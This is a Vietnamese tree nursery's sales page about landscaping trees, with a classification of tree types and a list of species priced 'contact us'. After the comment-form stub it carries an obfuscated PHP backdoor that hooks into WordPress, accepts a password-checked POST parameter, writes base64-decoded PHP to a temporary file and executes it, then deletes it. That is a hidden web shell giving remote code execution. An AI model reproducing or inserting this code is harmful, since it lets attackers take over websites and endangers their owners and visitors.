Giá cả cây xanh công trình 2019

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây công trình vừa đóng vai trò trang trí, vừa ra quả, tạo bóng mát và điều hòa không khí cho các khu công trình và đô thị trong lành, thông thoáng hơn. Người ta thường trồng cây công trình tại những nơi công cộng như công viên, đường phố, dải phân cách hay những khu vực có khuôn viên nhỏ hơn như nhà máy, biệt thự, đường phố, nhà riêng…

Cây công trình
Cây công trình

Phân loại cây công trình

Cây công trình có rất nhiều loại. Dựa vào những đặc điểm đặc trưng mà người ta phân loại cây công trình như sau:

Theo nguồn gốc

 

Có 2 nguồn gốc chính của cây công trình là cây xanh trồng nhân tạocây xanh mọc tự nhiên.

 

Việc phân chia này gây khó khăn trong việc đánh giá và quy hoạch do phải phụ thuộc vào đặc điểm phát triển lịch sử ở tùng khu đô thị. Hầu hết các khu đô thị ở nước ta hiện nay đều trồng cây công trình nhân tạo.

Cây công trình
Cây công trình

Theo thành phần thực vật

 

Xét theo khí hậu thời tiết, ta có thể chia thành hai loại cây sau:

 

Cây vùng nhiệt đới – cây lá rộng: chủ yếu cung cấp bóng mát

 

Cây vùng ôn đới – cây lá kim: nhóm cây có tán thưa nên không dùng để tỏa bóng mát mà để làm cảnh trang trí.

 

Xét theo chiều cao của cây thì chia thành 3 loại là cây đại mộc cao trên 20m, cây trung bình cao trên 10m và cây tiểu mộc cao dưới 10m.

 

Căn cứ vào nhóm thực vật thì chia làm 2 nhóm là nhóm câynhóm cỏ. Nhóm cây bao gồm các loại cây thân gỗ. Nhóm cỏ có tác dụng làm nền cho đất thêm xanh, tạo nên không gian rộng lớn. Trồng có cũng góp phần giảm nhiệt độ đến 30% giữa nơi trồng và nơi đất trống. Trồng có còn đem lại rất nhiều công dụng như chống xói mòn đất, giữ ẩm và lắng lọc bụi bặm. Các sân thể thao ở nước ta thường được trồng cỏ gà, cỏ lá tre hay cỏ gừng.

Cây công trình
Cây công trình

Theo mục đích sử dụng

 

Mỗi người có nhu cầu khác nhau sẽ trồng những loại cây công trình khác nhau. Người thiết kế sẽ giúp bạn lựa chọn loại cây phù hợp cho không gian trồng.

Cây bóng mát

 

Đây là loại có thân gỗ lớn và tuổi đời cao. Trung bình mỗi cây sống từ 30 – 40 năm, những loài cổ thụ sống lên tới hàng nghìn năm. Chiều cao của cây cho bóng mát rất vượt trội, trung bình từ 5- 50m.

 

Là loại cây có thân gỗ lớn. Tuổi đời cao, trung bình từ 30 – 40 năm, có loài sống hàng nghìn năm. Chiều cao trung bình từ 5 – 50 mét. Cây bóng mát bao gồm nhiều loại như cây bóng mát thường ( loài lá kim, lá rộng, thường xanh ), cây bóng mát có hoa đẹp ( vàng anh, phượng, lim…), cây bóng mát ăn quả ( muỗm, dừa, hồng xiêm…)

 

Cây trang trí

 

Là những cây thân gỗ nhỏ, mọc bụi hay riêng lẻ, leo giàn và cây thân thảo. Cây trang trí thường được trồng làm cảnh và trang trí không gian ở tầng thấp. Có thể trồng trong chậu hay trưng bày trong nhà, trồng theo dàn leo…

 

Có những loại cây trang trí phổ biến như tre trúc, cau dừa, cây leo dàn, cây hàng rào, cây cảnh ra hoa…

 

Cây công trình trang trí
Cây công trình trang trí

Giá cây công trình 2019

Hiện nay, việc mua cây công trình là rất thịnh hành. Nếu bạn đang có ý định mua cây nhưng lại không biết tham khảo giá ở đâu đẹp thì hãy theo dõi qua bài viết của https://vuoncayhoabinh.com

Một số loại cây công trình phổ biến và được ưa chuộng như:

CÂY BÀNG ĐÀI LOAN: giá liên hệ

CÂY MÍT CÔNG TRÌNH: giá liên hệ

CÂY TÙNG BÁCH: giá liên hệ

CÂY LỘC VỪNG: giá liên hệ

CÂY SẤU CÔNG TRÌNH : giá liên hệ

CÂY PHƯỢNG CÔNG TRÌNH: giá liên hệ

CÂY SUNG CÔNG TRÌNH: giá liên hệ

CÂY XOÀI CÔNG TRÌNH: giá liên hệ

CÂY CAU VUA CÔNG TRÌNH: giá liên hệ

CÂY ĐA BÚP ĐỎ: giá liên hệ

CÂY BÁCH XANH: giá liên hệ

CÂY BỒ ĐỀ CÔNG TRÌNH: giá liên hệ

CÂY VÚ SỮA CÔNG TRÌNH: giá liên hệ

CÂY OSAKA ĐỎ: giá liên hệ

CÂY NGỌC LAN CÔNG TRÌNH: giá liên hệ

CÂY BẰNG LĂNG CÔNG TRÌNH: giá liên hệ

CÂY LONG NÃO – CÂY CÔNG TRÌNH GIÁ RẺ: giá liên hệ

CÂY HOA SỮA CÔNG TRÌNH: giá liên hệ

CÂY CỌ CÔNG TRÌNH: giá liên hệ

CÂY NHÃN CÔNG TRÌNH: giá liên hệ

CÂY NGỌC LAN CÔNG TRÌNH: giá liên hệ

CÂY XÀ CỪ CÔNG TRÌNH: giá liên hệ

 

Với hơn 20 năm kinh nghiệm trong việc chăm sóc và buôn bán cây trồng, https://vuoncayhoabinh.com tự tin mang đến cho bạn sản phẩm tốt nhất với giá không thể đẹp hơn. Bạn chắc chắn sẽ hài lòng khi chọn mua cây tại vuoncayhoabinh.com bởi đội ngũ nhân viên tư vấn chuyên nghiệp giúp bạn chọn được loại cây phù hợp cho không gian cũng như cách chăm sóc sao cho cây tươi tốt quanh năm.

 

Giá của cây công trình có thể biến đổi theo từng năm nhưng giá cả tại vuoncayhoabinh luôn nằm ở mức ổn định và phù hợp với kinh tế của mọi gia đình.

 

Trước khi giao cây cho khách, vuoncayhoabinh luôn ươm cây và giao bầu kỹ càng, đảm bảo cây ở trong điều kiện tốt nhất. Chúng tôi cũng có dịch vụ bảo hành cây miễn phí 100% trong 3 – 6 tháng.

 

Cảm ơn các bạn đã đọc bài viết của https://vuoncayhoabinh.com.

 

Chúc các bạn chọn được cho mình loại cây công trình phù hợp để tỏa bóng mát cũng như trang trí cho cảnh quan của mình. Mong các bạn luôn theo dõi và ủng hộ Vườn Cây Hòa Bình!

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}